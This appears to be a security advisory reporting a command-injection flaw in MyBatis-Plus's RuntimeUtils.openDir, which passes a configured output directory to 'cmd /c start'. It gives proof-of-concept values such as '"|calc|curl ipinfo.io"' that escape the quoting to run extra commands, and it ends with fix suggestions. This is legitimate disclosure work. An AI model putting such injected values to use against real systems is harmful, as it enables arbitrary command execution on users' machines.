MyBatis-Plus Command truncation injection can be carried on in com.baomidou.mybatisplus.generator.util.RuntimeUtils.openDir

Affected Artifact

[com.baomidou:mybatis-plus-core](https://mvnrepository.com/artifact/com.baomidou/mybatis-plus-core)

Affected Version

All the version before the latest(3.5.4.1)

Describe the Vulnerability

Root cause

There's a method com.baomidou.mybatisplus.generator.util.RuntimeUtils.openDir:

public static void openDir(String outDir) throws IOException {
    String osName = System.getProperty("os.name");
    ......
    if (osName.contains("Windows")) {
        Runtime.getRuntime().exec(MessageFormat.format("cmd /c start \"\" \"{0}\"", outDir));
    } 
    ......
}

cmd /c is used to execute command. However, it would introduce command truncation injection. If dangerous parameters are passed to openDir, malicious commands could be executed. For example,

RuntimeUtils.openDir("\"|calc|curl ipinfo.org\"");

In above case, the first quotation \" closes the left quotation, and the last quotation \" closes the right one. Then, we can use pipe operator to carry on truncation injection, and we can execute arbitrary commands such as opening a calculator on Windows, curl something or execute other dangerous commands.

Influence (Attack Scenario)

There exists such an call chain:

com.baomidou.mybatisplus.generator.AutoGenerator.execute(com.baomidou.mybatisplus.generator.engine.AbstractTemplateEngine) -->
com.baomidou.mybatisplus.generator.engine.AbstractTemplateEngine.open() -->
com.baomidou.mybatisplus.generator.util.RuntimeUtils.openDir(java.lang.String)

AutoGenerator.execute would call AbstractTemplateEngine.open, which would finally call RuntimeUtils.openDir. Therefore, if dangerous configurations are passed to AutoGenerator.execute, malicious commands would be executed. For example,

AutoGenerator mpg = new AutoGenerator();
GlobalConfig gc = new GlobalConfig();
......
gc.setOutputDir("\"|calc|curl ipinfo.io\"");
......
mpg.execute();

To Reproduce

Just do as the document(https://baomidou.com/pages/d357af/#%E6%B7%BB%E5%8A%A0%E4%BE%9D%E8%B5%96) suggests, and passing specified commands to setOutputDir.

AutoGenerator mpg = new AutoGenerator();
GlobalConfig gc = new GlobalConfig();
......
gc.setOutputDir("\"|calc|curl ipinfo.io\"");
......
mpg.execute();

Note:

Although the document says "3.5.1 and below are suitable"("适用版本：mybatis-plus-generator 3.5.1 以下版本). However, it is not correct. AutoGenerator is not deleted in the latest version 3.5.4.1.

Fix Suggestion

There are two ways to fix it.

One is a relatively modest fix. That is, do not use cmd /c. Because of the secure implementation of Runtime.getRuntime().exec() in Java, command truncation injection could not be carried on. Your cmd /c would destructively introduce the problem of command truncation injection. However, not using cmd /c does not completely fix the vulnerability. Attackers can still execute arbitrary executables through configuration like gc.setOutputDir("C:\\Windows\\System32\\calc.exe");, but you have not told library users that outputDir would be treated as a command, which would be executed. Thus, it is most important to update your document and tell the possible danger to library users.

One is a complete fix. We have noticed that within the whole MyBatis-Plus project, only AbstractTemplateEngine would use RuntimeUtils. And it seems that you just want to explicitly notify the user where the outputDir is, so it's unnecessary to execute outputDir. Therefore, we strongly suggest that you can remove RuntimeUtils.java from your project.